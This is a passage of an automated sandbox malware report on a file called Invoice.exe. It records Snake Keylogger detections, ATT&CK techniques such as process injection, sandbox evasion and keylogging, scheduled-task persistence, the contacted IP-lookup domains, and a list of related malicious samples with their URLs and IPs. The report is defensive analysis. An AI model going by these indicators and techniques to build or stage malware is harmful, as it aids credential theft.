Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Queries volume information: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\Invoice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.12.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.12.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.12.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.12.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0.2.Invoice.exe.3b90b50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.3bb1570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.3bb1570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.3b90b50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1497789349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1500060552.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Invoice.exe PID: 7028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7396, type: MEMORYSTR

Source: Yara match	File source: 0.2.Invoice.exe.3b90b50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.3bb1570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.3bb1570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.3b90b50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1497789349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Invoice.exe PID: 7028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7396, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0.2.Invoice.exe.3b90b50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.3bb1570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.3bb1570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.3b90b50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1497789349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1500060552.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Invoice.exe PID: 7028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7396, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	OS Credential Dumping	111 Security Software Discovery	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Software Packing	DCSync	12 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Invoice.exe	49%	Virustotal		Browse
Invoice.exe	45%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	45%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno

Source	Detection	Scanner	Label	Link
http://insimsniffer.codeplex.com/project/feeds/rss?ProjectRSSFeed=codeplex%3a%2f%2frelease%2finsimsn	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.16.1	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/8.46.123.189	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org	RegSvcs.exe, 00000009.00000002.1500060552.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.0000000003396000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000032DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.000000000337A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033D2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.0000000003388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.000000000336D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.12.dr	false		high
http://checkip.dyndns.org	RegSvcs.exe, 00000009.00000002.1500060552.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.0000000003396000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000032DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.000000000337A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033D2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.0000000003388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.000000000336D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	RegSvcs.exe, 00000009.00000002.1500060552.0000000003396000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000032DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.000000000337A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033D2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.0000000003388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.000000000336D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://insimsniffer.codeplex.com/project/feeds/rss?ProjectRSSFeed=codeplex%3a%2f%2frelease%2finsimsn	Invoice.exe, HbxYXheklrhvR.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Invoice.exe, 00000000.00000002.1342667781.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.0000000003211000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	Invoice.exe, 00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1497789349.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	RegSvcs.exe, 00000009.00000002.1500060552.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.0000000003396000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.000000000337A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033D2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.0000000003388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.000000000336D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	RegSvcs.exe, 00000009.00000002.1500060552.0000000003396000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000032F2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.000000000337A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000033D2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.0000000003388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.000000000336D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	Invoice.exe, 00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1500060552.00000000032DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1497789349.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States		16989	UTMEMUS	false
104.21.16.1	reallyfreegeoip.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1635033
Start date and time:	2025-03-11 09:58:26 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Invoice.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@23/25@2/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 94% Number of executed functions: 72 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.40.69.76, 23.60.203.209, 20.190.159.71, 20.12.23.50
Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, onedsblobvmssprdwus03.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, c.pki.goog, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RegSvcs.exe, PID 7396 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:59:26	API Interceptor	3x Sleep call for process: Invoice.exe modified
04:59:30	API Interceptor	45x Sleep call for process: powershell.exe modified
04:59:35	API Interceptor	173x Sleep call for process: RegSvcs.exe modified
04:59:37	API Interceptor	3x Sleep call for process: HbxYXheklrhvR.exe modified
04:59:39	API Interceptor	2x Sleep call for process: WerFault.exe modified
08:59:31	Task Scheduler	Run new task: HbxYXheklrhvR path: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	EM#U0130R_7880330875661236965345096345789_3479653.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	uyqMsPsOG1.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	7uUGimQipu.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	xWApJIM4Ma.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	77MmBkD2PE.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	ZV6c9EEXXN.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	48lsFvalYI.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	FlpPce0cmf.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	pLdncKcqbW.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	DMRdG3VjmG.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
104.21.16.1	J8bamK92a3.exe	Get hash	malicious	FormBook	Browse	www.play-vanguard-nirvana.xyz/egs9/?9r=2m/uVQwqKH2EIWlawszTKzvIepBfVH/HI19qzylF05nDLsWuBLn1pb4DiFDKEzYOkwPMwL8bVA==&vZR=H2MpG0p
	0t7MXNEfCg.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/2dxw/
	g1V10ssekg.exe	Get hash	malicious	FormBook	Browse	www.sigaque.today/n61y/?UPV=BOlfS7N9ZWkGRIMRgNC6B6+WUTyM673eSjZAzliNIDKZHnAeT7/5dfTbZtimq+dx8K4CQjPcymznAMXPWSrBBYPYz0JSQDMkWzhvpNbFnW2/OcjAWw==&YrV=FlsDgRMx
	0IrTeguWM7.exe	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/ftbq/
	Shipping Document.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/6m32/
	Payment Record.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sccc/five/fre.php
	Invoice Remittance ref27022558.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/a669/
	ujXpculHYDYhc6i.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sss2/five/fre.php
	368c6e62-b031-5b65-fd43-e7a610184138.eml	Get hash	malicious	HTMLPhisher	Browse	ce60771026585.oakdiiocese.org/p/298?session=770558a25b5d1fcbb8d81f113631d430f5b8d022cdc6d97cf6b16a412a3be9e6
	http://orico-rapaciid.xqyrr.cn/eorico/login/	Get hash	malicious	Unknown	Browse	orico-rapaciid.xqyrr.cn/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	QUOTATION_FEBQUOTE312025#U00faPDF.scr	Get hash	malicious	MSIL Logger	Browse	104.21.16.1
	kissingwithbestexperiencedgirlfriendonhereformenice.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	104.21.80.1
	PO202503S.xlsm	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	niceworkingskillwithbestideasevermade.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	104.21.16.1
	QUOTATION_FEBQUOTE312025PDF.scr.exe	Get hash	malicious	MSIL Logger	Browse	104.21.32.1
	New Order RFQ- 19A20060.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	EM#U0130R_7880330875661236965345096345789_3479653.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.32.1
	INQ_NO_097590_0109_Order.cmd	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	SIP_20252701095738583757327401213.bat.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.64.1
	ja811MqV4h.exe	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	104.21.32.1
checkip.dyndns.com	QUOTATION_FEBQUOTE312025#U00faPDF.scr	Get hash	malicious	MSIL Logger	Browse	193.122.130.0
	kissingwithbestexperiencedgirlfriendonhereformenice.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	132.226.247.73
	PO202503S.xlsm	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	niceworkingskillwithbestideasevermade.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	158.101.44.242
	QUOTATION_FEBQUOTE312025PDF.scr.exe	Get hash	malicious	MSIL Logger	Browse	132.226.247.73
	New Order RFQ- 19A20060.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	EM#U0130R_7880330875661236965345096345789_3479653.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.8.169
	INQ_NO_097590_0109_Order.cmd	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	SIP_20252701095738583757327401213.bat.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.6.168
	ja811MqV4h.exe	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	193.122.130.0

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	QUOTATION_FEBQUOTE312025#U00faPDF.scr	Get hash	malicious	MSIL Logger	Browse	104.21.16.1
	emotet.doc	Get hash	malicious	Unknown	Browse	104.21.88.91
	Wire Remittance Detail.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	kissingwithbestexperiencedgirlfriendonhereformenice.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	104.21.80.1
	PO202503S.xlsm	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	niceworkingskillwithbestideasevermade.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	104.21.16.1
	QUOTATION_FEBQUOTE312025PDF.scr.exe	Get hash	malicious	MSIL Logger	Browse	104.21.32.1
	P.Order request for quotations.exe	Get hash	malicious	FormBook	Browse	172.67.148.163
	PAYMENT COPY.exe	Get hash	malicious	FormBook	Browse	172.67.148.163
	Enquiry Quote - 21834-01.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
UTMEMUS	kissingwithbestexperiencedgirlfriendonhereformenice.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	132.226.247.73
	PO202503S.xlsm	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	QUOTATION_FEBQUOTE312025PDF.scr.exe	Get hash	malicious	MSIL Logger	Browse	132.226.247.73
	EM#U0130R_7880330875661236965345096345789_3479653.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.8.169
	BL-INVOICE DOCUMENTS.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	uyqMsPsOG1.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
